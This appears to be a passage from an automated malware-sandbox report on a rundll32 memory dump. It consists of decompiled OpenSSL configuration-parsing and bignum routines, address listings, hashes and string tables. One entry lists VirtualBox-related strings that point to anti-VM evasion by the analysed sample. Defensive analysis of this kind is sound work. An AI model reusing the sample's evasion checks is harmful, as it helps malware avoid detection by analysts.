				if (( *(_t420 + _t314 * 2) & 0x00000008) != 0) goto 0xf3033947;
				_t402 =  &(_t401[1]);
				_t341 = _t420 + _t314 * 2;
				if (( *(_t420 + _t314 * 2) & 0x00000010) != 0) goto 0xf3033930;
				_t428 = _t402;
				asm("o16 nop [eax+eax]");
				if (( *(_t420 + _t341 * 2) & 0x20) == 0) goto 0xf3033987;
				asm("dec eax");
				_t342 = _t341 + 2;
				goto 0xf3033960;
				if ((0x00000307 &  ~( *(_t420 + _t341 * 2) & 8)) == 0) goto 0xf3033991;
				_t317 =  &(( &(_t428[_t342]))[1]);
				goto 0xf3033960;
				_t343 = _t342 + _t342;
				if (( *(_t343 + _t420) & 0x00000010) == 0) goto 0xf30339be;
				if (( *(_t420 + _t343) & 0x00000008) != 0) goto 0xf30339be;
				_t378 =  &(_t317[1]);
				if (( *(_t420 + _t343 + _t343) & 0x00000010) != 0) goto 0xf30339a6;
				_t204 =  *_t378 & 0x000000ff;
				if (_t204 == 0x5d) goto 0xf30339df;
				if (_t204 == 0) goto 0xf3033dd1;
				if (_t428 == _t378) goto 0xf3033dd1;
				goto 0xf3033950;
				 *_t317 = r12b;
				0xf30340b0();
				_t407 = _a24;
				if ((_t401[1] & 0x000000ff) == 0) goto 0xf3033c59;
				_a16 = _t407;
				0xf3034670();
				if (_t317 != 0) goto 0xf3033d5e;
				0xf3034840();
				if (_t317 != 0) goto 0xf3033d5e;
				_v24 = 0x11b;
				_t98 =  &(_t317[0x79]); // 0x79
				_t99 =  &(_t317[0xe]); // 0xe
				_t100 =  &(_t317[0x67]); // 0x67
				r8d = _t100;
				E0000021E21EF30222D0(_t99, _t98, _t317, _t317, _t327, _t441, _t407, _t407, _a8, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
				goto 0xf3033c59;
				E0000021E21EF3034060(_t317, _t441, _t402);
				if ( *_t317 != 0x3a) goto 0xf3033a8b;
				if (_t317[1] != 0x3a) goto 0xf3033a8b;
				 *_t317 = bpl;
				_t102 =  &(_t317[2]); // 0x2
				_t103 =  &(_t317[2]); // 0x2
				_t403 = _t103;
				E0000021E21EF3034060(_t317, _t441, _t102);
				_t439 = _t317;
				_t383 =  *((intOrPtr*)(_t441 + 8));
				_t318 =  &(_t317[_t317]);
				if (( *(_t383 + _t318) & 0x00000010) == 0) goto 0xf3033ab6;
				if (( *(_t383 + _t318) & 0x00000008) != 0) goto 0xf3033ab6;
				_t351 =  &(_t439[1]);
				_t319 =  &(_t318[_t318]);
				if (( *(_t383 + _t319) & 0x00000010) != 0) goto 0xf3033aa0;
				if ( *_t351 != 0x3d) goto 0xf3033e4a;
				_t352 =  &(_t351[1]);
				 *_t439 = r12b;
				_t384 =  *((intOrPtr*)(_t441 + 8));
				_t320 =  &(_t319[_t319]);
				r8d =  *(_t384 + _t320) & 0x0000ffff;
				if ((r8b & 0x00000010) == 0) goto 0xf3033af6;
				if (( *(_t384 + _t320) & 0x00000008) != 0) goto 0xf3033af6;
				_t329 =  &(_t352[1]);
				_t321 =  &(_t320[_t320]);
				if (( *(_t384 + _t321) & 0x00000010) != 0) goto 0xf3033ae0;
				if ((r8b & 0x00000008) != 0) goto 0xf3033b0d;
				if (( *(_t384 + _t321 * 2) & 0x00000008) == 0) goto 0xf3033b00;
				_t354 =  &(_t352[1]) - 1;
				if (_t354 == _t329) goto 0xf3033b26;
				if (( *(_t384 + _t321 * 2) & 0x00000010) == 0) goto 0xf3033b26;
				_t355 = _t354 - 1;
				if (_t355 != _t329) goto 0xf3033b15;
				 *(_t355 + 1) = r12b;
				r8d = 0x13a;
				E0000021E21EF3025700();
				_t445 = _t321;
				if (_t321 == 0) goto 0xf3033e40;
				_t413 =  ==  ? _t407 : _t402;
				if ( *_t403 == 0) goto 0xf3033b72;
				if (0 - 0x80000000 >= 0) goto 0xf3033b72;
				if ( *((intOrPtr*)(_t403 + 1)) != r12b) goto 0xf3033b60;
				asm("btr ecx, 0x1f");
				r8d = 0x140;
				E0000021E21EF3025700();
				 *(_t445 + 8) = _t321;
				 *((long long*)(_t445 + 0x10)) = _t440;
				if (_t321 == 0) goto 0xf3033e16;
				if ( *_t403 == 0) goto 0xf3033bb6;
				if (0 - 0x80000000 >= 0) goto 0xf3033bb6;
				if ( *((intOrPtr*)(_t403 + 1)) != r12b) goto 0xf3033ba4;
				asm("btr ecx, 0x1f");
				_t140 = _t355 + 1; // 0x2
				r8d = _t140;
				_t186 = E0000021E21EF3025650(_t321, _t321, _t403,  &_a24, _t439);
				0xf30340b0();
				_t297 = _t186;
				if (_t297 == 0) goto 0xf3033c54;
				_t322 = _t413;
				r8d =  *_t322 & 0x000000ff;
				_t212 = _t322[_a16 - _t413] & 0x000000ff;
				r8d = r8d - _t212;
				if (_t297 != 0) goto 0xf3033c05;
				_t323 =  &(_t322[1]);
				if (_t212 != 0) goto 0xf3033bf0;
				if (r8d == 0) goto 0xf3033d40;
				0xf3034670();
				if (_t323 != 0) goto 0xf3033d43;
				0xf3034840();
				if (_t323 != 0) goto 0xf3033d43;
				_v24 = 0x150;
				_t145 =  &(_t323[0x79]); // 0x79
				_t146 =  &(_t323[0xe]); // 0xe
				_t147 =  &(_t323[0x67]); // 0x67
				r8d = _t147;
				E0000021E21EF30222D0(_t146, _t145, _t323, _t323, _t329, _t441, _t413, _a16, _t413, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
				_t194 = _v8;
				E0000021E21EF304DA20(_t323, _a8);
				r8d = 0x161;
				E0000021E21EF3025750();
				_t324 = _a40;
				if (_t324 == 0) goto 0xf3033c8b;
				 *_t324 = _t194;
				r9d = _t194;
				E0000021E21EF3026420(_t324,  &_a48, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c", "%ld", "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
				E0000021E21EF3021640(2, _t324, "line ",  &_a48, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
				if (_v0 ==  *((intOrPtr*)(_t441 + 0x10))) goto 0xf3033cd0;
				E0000021E21EF30293C0(_t324,  *((intOrPtr*)(_t441 + 0x10)));
				 *((long long*)(_t441 + 0x10)) = 0;
				if (_t445 == 0) goto 0xf3033d16;
				r8d = 0x16b;
				E0000021E21EF3025750();
				r8d = 0x16c;
				E0000021E21EF3025750();
				r8d = 0x16d;
				E0000021E21EF3025750();
				E0000021E21EF310C290();
				return 0;
			}































































                                        0x21ef30336a0
                                        0x21ef30336a0
                                        0x21ef30336a0
                                        0x21ef30336b5
                                        0x21ef30336bd
                                        0x21ef30336c4
                                        0x21ef30336c7
                                        0x21ef30336d2
                                        0x21ef30336d6
                                        0x21ef30336d9
                                        0x21ef30336de
                                        0x21ef30336e1
                                        0x21ef30336e8
                                        0x21ef30336ed
                                        0x21ef30336f2
                                        0x21ef30336fd
                                        0x21ef3033706
                                        0x21ef303370e
                                        0x21ef3033711
                                        0x21ef3033714
                                        0x21ef3033714
                                        0x21ef3033718
                                        0x21ef303371d
                                        0x21ef3033722
                                        0x21ef303372f
                                        0x21ef3033736
                                        0x21ef303373b
                                        0x21ef3033743
                                        0x21ef303374b
                                        0x21ef303374d
                                        0x21ef3033755
                                        0x21ef3033760
                                        0x21ef3033767
                                        0x21ef303376a
                                        0x21ef303376f
                                        0x21ef303377e
                                        0x21ef3033780
                                        0x21ef3033788
                                        0x21ef3033790
                                        0x21ef303379b
                                        0x21ef303379d
                                        0x21ef30337a5
                                        0x21ef30337a5
                                        0x21ef30337a9
                                        0x21ef30337b3
                                        0x21ef30337b8
                                        0x21ef30337c0
                                        0x21ef30337c6
                                        0x21ef30337d5
                                        0x21ef30337de
                                        0x21ef30337e5
                                        0x21ef30337e8
                                        0x21ef30337ef
                                        0x21ef30337fb
                                        0x21ef3033806
                                        0x21ef3033808
                                        0x21ef303380d
                                        0x21ef3033810
                                        0x21ef3033818
                                        0x21ef303381b
                                        0x21ef303381f
                                        0x21ef3033829
                                        0x21ef303382f
                                        0x21ef3033835
                                        0x21ef303383b
                                        0x21ef3033841
                                        0x21ef3033846
                                        0x21ef303384a
                                        0x21ef303384f
                                        0x21ef3033859
                                        0x21ef303385d
                                        0x21ef3033862
                                        0x21ef3033869
                                        0x21ef303386d
                                        0x21ef303386f
                                        0x21ef3033873
                                        0x21ef3033876
                                        0x21ef303387a
                                        0x21ef303387d
                                        0x21ef3033884
                                        0x21ef3033886
                                        0x21ef303388a
                                        0x21ef303389e
                                        0x21ef30338a4
                                        0x21ef30338af
                                        0x21ef30338b1
                                        0x21ef30338b9
                                        0x21ef30338c0
                                        0x21ef30338c6
                                        0x21ef30338d0
                                        0x21ef30338d3
                                        0x21ef30338db
                                        0x21ef30338df
                                        0x21ef30338e7
                                        0x21ef30338f5
                                        0x21ef30338fb
                                        0x21ef30338fe
                                        0x21ef3033906
                                        0x21ef3033910
                                        0x21ef3033918
                                        0x21ef3033922
                                        0x21ef303392e
                                        0x21ef3033933
                                        0x21ef3033939
                                        0x21ef3033941
                                        0x21ef3033945
                                        0x21ef3033947
                                        0x21ef303394a
                                        0x21ef303396b
                                        0x21ef303397b
                                        0x21ef303397e
                                        0x21ef3033985
                                        0x21ef303398a
                                        0x21ef303398c
                                        0x21ef303398f
                                        0x21ef303399c
                                        0x21ef30339a4
                                        0x21ef30339ab
                                        0x21ef30339b1
                                        0x21ef30339bc
                                        0x21ef30339be
                                        0x21ef30339c4
                                        0x21ef30339c8
                                        0x21ef30339d1
                                        0x21ef30339da
                                        0x21ef30339e2
                                        0x21ef30339ef
                                        0x21ef30339f4
                                        0x21ef30339fb
                                        0x21ef3033a04
                                        0x21ef3033a0c
                                        0x21ef3033a17
                                        0x21ef3033a23
                                        0x21ef3033a2e
                                        0x21ef3033a3b
                                        0x21ef3033a43
                                        0x21ef3033a46
                                        0x21ef3033a49
                                        0x21ef3033a49
                                        0x21ef3033a4d
                                        0x21ef3033a52
                                        0x21ef3033a5f
                                        0x21ef3033a6a
                                        0x21ef3033a70
                                        0x21ef3033a72
                                        0x21ef3033a75
                                        0x21ef3033a7f
                                        0x21ef3033a7f
                                        0x21ef3033a83
                                        0x21ef3033a88
                                        0x21ef3033a92
                                        0x21ef3033a96
                                        0x21ef3033a9d
                                        0x21ef3033aa4
                                        0x21ef3033aaa
                                        0x21ef3033aad
                                        0x21ef3033ab4
                                        0x21ef3033ab9
                                        0x21ef3033abf
                                        0x21ef3033ac2
                                        0x21ef3033ac5
                                        0x21ef3033acf
                                        0x21ef3033ad2
                                        0x21ef3033adb
                                        0x21ef3033ae4
                                        0x21ef3033aea
                                        0x21ef3033aed
                                        0x21ef3033af4
                                        0x21ef3033afa
                                        0x21ef3033b0b
                                        0x21ef3033b0d
                                        0x21ef3033b13
                                        0x21ef3033b1c
                                        0x21ef3033b1e
                                        0x21ef3033b24
                                        0x21ef3033b26
                                        0x21ef3033b36
                                        0x21ef3033b3c
                                        0x21ef3033b41
                                        0x21ef3033b47
                                        0x21ef3033b53
                                        0x21ef3033b5b
                                        0x21ef3033b66
                                        0x21ef3033b70
                                        0x21ef3033b72
                                        0x21ef3033b7f
                                        0x21ef3033b85
                                        0x21ef3033b8a
                                        0x21ef3033b8e
                                        0x21ef3033b95
                                        0x21ef3033ba2
                                        0x21ef3033baa
                                        0x21ef3033bb4
                                        0x21ef3033bb6
                                        0x21ef3033bbd
                                        0x21ef3033bbd
                                        0x21ef3033bc4
                                        0x21ef3033bd6
                                        0x21ef3033be0
                                        0x21ef3033be2
                                        0x21ef3033be7
                                        0x21ef3033bf0
                                        0x21ef3033bf4
                                        0x21ef3033bf9
                                        0x21ef3033bfc
                                        0x21ef3033bfe
                                        0x21ef3033c03
                                        0x21ef3033c08
                                        0x21ef3033c14
                                        0x21ef3033c1c
                                        0x21ef3033c28
                                        0x21ef3033c30
                                        0x21ef3033c36
                                        0x21ef3033c45
                                        0x21ef3033c48
                                        0x21ef3033c4b
                                        0x21ef3033c4b
                                        0x21ef3033c4f
                                        0x21ef3033c59
                                        0x21ef3033c65
                                        0x21ef3033c6a
                                        0x21ef3033c7a
                                        0x21ef3033c7f
                                        0x21ef3033c87
                                        0x21ef3033c89
                                        0x21ef3033c8b
                                        0x21ef3033c9f
                                        0x21ef3033cb5
                                        0x21ef3033cc1
                                        0x21ef3033cc3
                                        0x21ef3033cc8
                                        0x21ef3033cd3
                                        0x21ef3033ce0
                                        0x21ef3033ce6
                                        0x21ef3033cf6
                                        0x21ef3033cfc
                                        0x21ef3033d01
                                        0x21ef3033d11
                                        0x21ef3033d20
                                        0x21ef3033d3f

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %ld$..\..\openssl-1.1.0f\crypto\conf\conf_def.c$default$line
                                        • API String ID: 0-1379452798
                                        • Opcode ID: 859084852f15298ba9df795f8348e589798a38aacf1845cc27fb78756dde12f6
                                        • Instruction ID: 78ebf13ec4be32510f263fe90d278ecc7437fad48e69e6ddac01f6d80467d27a
                                        • Opcode Fuzzy Hash: 859084852f15298ba9df795f8348e589798a38aacf1845cc27fb78756dde12f6
                                        • Instruction Fuzzy Hash: 3E22BF7230468886FF658B16D8987EBABA0E761B84F464097DE8D07FD2EB7DC546C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301EFD0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: IPCA$VBOX$VirtualBox$vbox
                                        • API String ID: 0-3862313162
                                        • Opcode ID: 3a558d1467ed154bcedb665484e3ebc3f568674caad167e9b7a352004574b562
                                        • Instruction ID: fe8b20c855926a8d331e955983bfac52f59799c2370da02605b564876d998179
                                        • Opcode Fuzzy Hash: 3a558d1467ed154bcedb665484e3ebc3f568674caad167e9b7a352004574b562
                                        • Instruction Fuzzy Hash: F531A63230468141FE11A711AC053EBA7E1F7A4BE4F454626EE4997F9BEA3DD943C704
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF311E430 Relevance: 4.8, APIs: 3, Instructions: 340COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF311E430(intOrPtr* __rcx, long long __rdx, long long _a16) {

				_a16 = __rdx;
				r9d =  *__rcx;
				if (r9d != 0) goto 0xf311e458;
				return 0;
			}



                                        0x21ef311e430
                                        0x21ef311e43e
                                        0x21ef311e44a
                                        0x21ef311e457

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpy_s
                                        • String ID:
                                        • API String ID: 1502251526-0
                                        • Opcode ID: e7efa60ed8ecf791811c52bf8fd01539573293fb11a05045d0a2fab4e6760db6
                                        • Instruction ID: 108c476338bffbbf7f443b301d47b94124ea0dc1ca47629eb98d41a30f848d09
                                        • Opcode Fuzzy Hash: e7efa60ed8ecf791811c52bf8fd01539573293fb11a05045d0a2fab4e6760db6
                                        • Instruction Fuzzy Hash: DBD1CA3271428187EB64DF55A988BEBB7E9F3A8784F058224DF4A53B45DA3CDC42CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3083590 Relevance: 4.2, Strings: 3, Instructions: 469COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E0000021E21EF3083590(void* __ebx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, long long __r8, void* __r9, long long __r15, long long _a8, long long _a16, signed char* _a24, intOrPtr _a32, signed char* _a40, signed char* _a48, long long _a56, long long _a64, void* _a72, signed char* _a80, signed char* _a336, signed long long _a592, long long _a616, long long _a624, long long _a720, intOrPtr* _a728, long long _a736, long long _a744) {
				signed char* _v0;
				long long _v16;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t118;
				void* _t119;
				void* _t129;
				void* _t138;
				void* _t173;
				signed char* _t174;
				signed char* _t181;
				signed char* _t183;
				signed char* _t191;
				void* _t210;
				signed char* _t223;
				void* _t224;
				void* _t266;
				void* _t288;
				signed long long _t293;
				signed char* _t296;
				long long _t297;
				long long _t300;
				signed long long _t301;
				signed long long _t302;
				long long _t304;
				long long _t305;
				signed char* _t353;
				long long _t367;
				signed int _t368;
				signed int _t369;
				void* _t370;
				signed char* _t373;
				signed char* _t374;
				long long _t375;
				long long _t376;
				void* _t377;
				signed long long _t378;
				intOrPtr _t417;
				void* _t418;
				intOrPtr _t422;
				signed char* _t424;

				_t348 = __rdx;
				_t300 = __rbx;
				E0000021E21EF310C220();
				_t378 = _t377 - __rax;
				_t293 =  *0xf3203000; // 0x1fc8e4a4378e
				_a592 = _t293 ^ _t378;
				_t418 = __r9;
				_t416 = _a728;
				_t370 = __rdx;
				_t365 = _a720;
				_t373 = __rcx;
				_t414 = _a736;
				_a56 = _a744;
				_t296 =  *_a728;
				_a64 = __r8;
				_a40 = __rcx;
				_a72 = _a720;
				_a8 = _a736;
				_a16 = 0;
				if (( *_t296 & 0x00000001) != 0) goto 0xf3083634;
				_v16 = 0x24;
				_t15 = _t348 - 0x73; // 0x3
				_t16 = _t348 - 0x10; // 0x66
				r8d = _t16;
				E0000021E21EF30222D0(_t15, 0x76,  *_t296 & 0x00000001, _t296, __rbx, __rcx, __rdx, __rdx, __rcx, "..\\..\\openssl-1.1.0f\\crypto\\bn\\bn_exp2.c");
				goto 0xf3083c41;
				_a624 = _t300;
				_t173 = E0000021E21EF3043D90(_t296, __r8);
				_t118 = E0000021E21EF3043D90(_t296, _a720);
				_t210 = _t118;
				if (_t173 != 0) goto 0xf3083668;
				if (_t118 != 0) goto 0xf3083668;
				_t119 = E0000021E21EF3044090(_t296, _t300, _t373, _t348);
				goto 0xf3083c39;
				_a616 = __r15;
				_t120 =  >  ? _t173 : _t119;
				_a32 =  >  ? _t173 : _t119;
				E0000021E21EF3079EF0(_t296, _a736);
				E0000021E21EF3079DF0(_t296, _t414, _t365);
				_a24 = _t296;
				E0000021E21EF3079DF0(_t296, _t414, _t365);
				_a48 = _t296;
				E0000021E21EF3079DF0(_t296, _t414, _t365);
				_a80 = _t296;
				_t374 = _t296;
				E0000021E21EF3079DF0(_t296, _t414, _t365);
				_a336 = _t296;
				_t415 = _t296;
				if (_t296 == 0) goto 0xf3083c03;
				if (_a48 == 0) goto 0xf3083c03;
				if (_t374 == 0) goto 0xf3083c03;
				if (_t296 == 0) goto 0xf3083c03;
				_t297 = _a56;
				if (_t297 == 0) goto 0xf30836fc;
				_a16 = _t297;
				goto 0xf308372a;
				E0000021E21EF30795F0(_t297);
				_t422 = _a8;
				_a16 = _t297;
				if (_t297 == 0) goto 0xf3083c14;
				if (E0000021E21EF3079670(_t297, _t297, _t297, _a728, _t370, _t422) == 0) goto 0xf3083c18;
				_t30 = _t297 - 2; // 0x1
				_t31 = _t297 + 3; // 0x6
				r15d = _t31;
				if (_t173 - 0x29f <= 0) goto 0xf3083747;
				_t174 = r15d;
				_v0 = _t174;
				goto 0xf308377b;
				if (_t174 - 0xef <= 0) goto 0xf308375a;
				_v0 = 5;
				goto 0xf308377b;
				if (5 - 0x4f <= 0) goto 0xf308376a;
				_v0 = 4;
				goto 0xf308377b;
				_t191 =  >  ? 3 : _t30;
				_v0 = _t191;
				if (_t210 - 0x29f > 0) goto 0xf30837aa;
				if (_t210 - 0xef <= 0) goto 0xf3083793;
				r15d = 5;
				goto 0xf30837aa;
				if (_t210 - 0x4f <= 0) goto 0xf30837a0;
				r15d = 4;
				goto 0xf30837aa;
				r15d = 1;
				r15d =  >  ? 3 : r15d;
				if ( *((intOrPtr*)(_t370 + 0x10)) != 0) goto 0xf30837c6;
				_t129 = E0000021E21EF3044130( *((intOrPtr*)(_t370 + 0x10)), _t370, _t416, _t422);
				if (_t129 >= 0) goto 0xf30837c6;
				goto 0xf30837eb;
				_t367 = _a8;
				_v16 = _t367;
				0xf307ddd0();
				if (_t129 == 0) goto 0xf3083c03;
				if (E0000021E21EF3043C90(_t374) == 0) goto 0xf3083815;
				E0000021E21EF3044090(_t297, _t300, _a40, _t374);
				_a40 = 1;
				_t301 = _a40;
				goto 0xf3083c05;
				if (E0000021E21EF3044100(_t297, _a16, _t367) == 0) goto 0xf3083c03;
				_t372 = _a24;
				if (_t191 - 1 <= 0) goto 0xf30838c5;
				_t353 = _t374;
				_v16 = _t367;
				if (E0000021E21EF3079C50(_t297, _t301, _a24, _t353, _t367, _t372, _t374, _t374, _a16) == 0) goto 0xf3083c03;
				_t375 = _a8;
				_t48 = _t301 - 1; // 0x0
				_t368 = 1 << _t48;
				if (_t353 - _t368 >= 0) goto 0xf30838ca;
				E0000021E21EF3079DF0(_t297, _t375, _t368);
				 *((long long*)(_t378 + 0x80 + _t301 * 8)) = _t297;
				if (_t297 == 0) goto 0xf3083c03;
				_v16 = _t375;
				if (E0000021E21EF3079C50(_t297, _t301, _t297,  *((intOrPtr*)(_t378 + 0x78 + _t301 * 8)), _t368, _t372, _t375, _t372, _a16) == 0) goto 0xf3083c03;
				_t302 =  &(1[_t301]);
				if (_t302 - _t368 < 0) goto 0xf3083880;
				goto 0xf30838ca;
				_t376 = _a8;
				if ( *((intOrPtr*)(_t418 + 0x10)) != 0) goto 0xf30838e0;
				_t138 = E0000021E21EF3044130( *((intOrPtr*)(_t418 + 0x10)), _t418, _t416, _t372);
				if (_t138 < 0) goto 0xf3083900;
				_v16 = _t376;
				0xf307ddd0();
				if (_t138 == 0) goto 0xf3083c03;
				if (E0000021E21EF3043C90(_t296) == 0) goto 0xf3083922;
				E0000021E21EF3044090(_t297, _t302, _a40, _t296);
				goto 0xf3083c05;
				_t417 = _a16;
				if (E0000021E21EF3044100(_t297, _t417, _t376) == 0) goto 0xf3083c03;
				if (r15d - 1 <= 0) goto 0xf30839c4;
				_v16 = _t376;
				if (E0000021E21EF3079C50(_t297, _t302, _t372, _t415, _t368, _t372, _t376, _t415, _t417) == 0) goto 0xf3083c03;
				_t63 = _t422 - 1; // 0x5
				_t369 = 1 << _t63;
				if (_t302 - _t369 >= 0) goto 0xf30839c4;
				E0000021E21EF3079DF0(_t297, _t376, _t369);
				 *((long long*)(_t378 + 0x180 + _t302 * 8)) = _t297;
				if (_t297 == 0) goto 0xf3083c03;
				_v16 = _t376;
				if (E0000021E21EF3079C50(_t297, _t302, _t297,  *((intOrPtr*)(_t378 + 0x178 + _t302 * 8)), _t369, _t372, _t376, _t372, _t417) == 0) goto 0xf3083c03;
				if ( &(1[_t302]) - _t369 < 0) goto 0xf3083980;
				r12d = 0;
				_a24 = 1;
				r14d = r12d;
				E0000021E21EF3044180(_t146);
				_t304 = _a8;
				_t266 = E0000021E21EF3044100(_t297, _t417, _t304);
				if (_t266 == 0) goto 0xf3083c03;
				r13d = _a32;
				r13d = r13d - 1;
				if (_t266 < 0) goto 0xf3083bd4;
				r12d = _t417 - 1;
				_a32 = r15d - _v0;
				_v0 = 2 - r15d;
				if (_a24 != 0) goto 0xf3083a59;
				_t298 = _a48;
				_v16 = _t304;
				if (E0000021E21EF3079C50(_a48, _t304, _a48, _t298, _t369, _t372, _t376, _t298, _a16) == 0) goto 0xf3083c03;
				if (r12d != 0) goto 0xf3083ac9;
				_t423 = _a64;
				if (E0000021E21EF3043BD0(r13d, _a64) == 0) goto 0xf3083ac9;
				r14d = _v0;
				r14d =  &(r14d[_a32]);
				r14d =  &(r14d[r12d]);
				if (E0000021E21EF3043BD0(r14d, _a64) != 0) goto 0xf3083aa2;
				r14d =  &(r14d[1]);
				if (E0000021E21EF3043BD0(r14d, _t423) == 0) goto 0xf3083a90;
				_t181 = r12d;
				if (r12d - r14d < 0) goto 0xf3083ac9;
				if (E0000021E21EF3043BD0(_t181, _t423) == 0) goto 0xf3083ac2;
				if (_t181 - 1 - r14d >= 0) goto 0xf3083ab0;
				if (r12d != 0) goto 0xf3083b38;
				_t424 = _a72;
				if (E0000021E21EF3043BD0(r13d, _t424) == 0) goto 0xf3083b38;
				_t223 =  &(_v0[r12d]);
				if (E0000021E21EF3043BD0(_t223, _t424) != 0) goto 0xf3083b10;
				asm("o16 nop [eax+eax]");
				_t224 = _t223 + 1;
				if (E0000021E21EF3043BD0(_t224, _t424) == 0) goto 0xf3083b00;
				_t183 = r12d;
				if (r12d - _t224 < 0) goto 0xf3083b38;
				if (E0000021E21EF3043BD0(_t183, _t424) == 0) goto 0xf3083b32;
				if (_t183 - 1 - _t224 >= 0) goto 0xf3083b20;
				_t305 = _a8;
				if (1 == 0) goto 0xf3083b82;
				if (r13d != r14d) goto 0xf3083b82;
				_v16 = _t305;
				if (E0000021E21EF3079C50(_t298, _t305, _a48, _a48, _t369, _t372, _t376,  *((intOrPtr*)(_t378 + 0x5d6dde8)), _a16) == 0) goto 0xf3083c03;
				r15d = 0;
				_a24 = r15d;
				goto 0xf3083b89;
				r15d = 0;
				if (1 == 0) goto 0xf3083bc5;
				if (r13d != _t224) goto 0xf3083bc5;
				_v16 = _t305;
				_t288 = E0000021E21EF3079C50(_t298, _t305, _a48, _a48, _t369, _t372, _t376,  *((intOrPtr*)(_t378 + 0x5d6dee8)), _a16);
				if (_t288 == 0) goto 0xf3083c03;
				_a24 = r15d;
				r12d = r12d - 1;
				r13d = r13d - 1;
				if (_t288 >= 0) goto 0xf3083a30;
				goto 0xf3083bd7;
				r15d = 0;
				0xf3079940();
				r15d =  !=  ? 1 : r15d;
				_a40 = _t424;
				goto 0xf3083c05;
				if (_a56 != 0) goto 0xf3083c27;
				goto 0xf3083c1a;
				goto 0xf3083c1f;
				E0000021E21EF3079590(_a16, _a16, _a48);
				E0000021E21EF3079D10(_a8);
				E0000021E21EF310C290();
				return 0;
			}













































                                        0x21ef3083590
                                        0x21ef3083590
                                        0x21ef308359f
                                        0x21ef30835a4
                                        0x21ef30835a7
                                        0x21ef30835b1
                                        0x21ef30835c1
                                        0x21ef30835c4
                                        0x21ef30835cc
                                        0x21ef30835cf
                                        0x21ef30835d7
                                        0x21ef30835da
                                        0x21ef30835e2
                                        0x21ef30835e7
                                        0x21ef30835eb
                                        0x21ef30835f0
                                        0x21ef30835f5
                                        0x21ef30835fd
                                        0x21ef3083602
                                        0x21ef308360b
                                        0x21ef3083612
                                        0x21ef3083621
                                        0x21ef3083624
                                        0x21ef3083624
                                        0x21ef3083628
                                        0x21ef308362f
                                        0x21ef3083637
                                        0x21ef3083647
                                        0x21ef3083649
                                        0x21ef308364e
                                        0x21ef3083652
                                        0x21ef3083656
                                        0x21ef308365e
                                        0x21ef3083663
                                        0x21ef308366a
                                        0x21ef3083675
                                        0x21ef3083678
                                        0x21ef308367c
                                        0x21ef3083684
                                        0x21ef308368c
                                        0x21ef3083694
                                        0x21ef308369c
                                        0x21ef30836a1
                                        0x21ef30836a9
                                        0x21ef30836b1
                                        0x21ef30836b4
                                        0x21ef30836b9
                                        0x21ef30836c1
                                        0x21ef30836c7
                                        0x21ef30836d3
                                        0x21ef30836dc
                                        0x21ef30836e5
                                        0x21ef30836eb
                                        0x21ef30836f3
                                        0x21ef30836f5
                                        0x21ef30836fa
                                        0x21ef30836fc
                                        0x21ef3083701
                                        0x21ef3083706
                                        0x21ef308370e
                                        0x21ef3083724
                                        0x21ef308372f
                                        0x21ef3083732
                                        0x21ef3083732
                                        0x21ef308373c
                                        0x21ef308373e
                                        0x21ef3083741
                                        0x21ef3083745
                                        0x21ef308374d
                                        0x21ef3083754
                                        0x21ef3083758
                                        0x21ef308375d
                                        0x21ef3083764
                                        0x21ef3083768
                                        0x21ef308376d
                                        0x21ef3083770
                                        0x21ef3083781
                                        0x21ef3083789
                                        0x21ef308378b
                                        0x21ef3083791
                                        0x21ef3083796
                                        0x21ef3083798
                                        0x21ef308379e
                                        0x21ef30837a3
                                        0x21ef30837a6
                                        0x21ef30837ae
                                        0x21ef30837b6
                                        0x21ef30837bd
                                        0x21ef30837c4
                                        0x21ef30837c6
                                        0x21ef30837d1
                                        0x21ef30837db
                                        0x21ef30837e2
                                        0x21ef30837f5
                                        0x21ef30837fe
                                        0x21ef3083803
                                        0x21ef308380b
                                        0x21ef3083810
                                        0x21ef308382a
                                        0x21ef3083830
                                        0x21ef3083838
                                        0x21ef3083846
                                        0x21ef3083849
                                        0x21ef3083858
                                        0x21ef308385e
                                        0x21ef3083863
                                        0x21ef3083871
                                        0x21ef3083877
                                        0x21ef3083883
                                        0x21ef3083888
                                        0x21ef3083893
                                        0x21ef30838a9
                                        0x21ef30838b5
                                        0x21ef30838bb
                                        0x21ef30838c1
                                        0x21ef30838c3
                                        0x21ef30838c5
                                        0x21ef30838cf
                                        0x21ef30838d7
                                        0x21ef30838de
                                        0x21ef30838e3
                                        0x21ef30838f0
                                        0x21ef30838f7
                                        0x21ef308390a
                                        0x21ef3083913
                                        0x21ef308391d
                                        0x21ef3083922
                                        0x21ef308393a
                                        0x21ef3083944
                                        0x21ef3083949
                                        0x21ef308395e
                                        0x21ef3083969
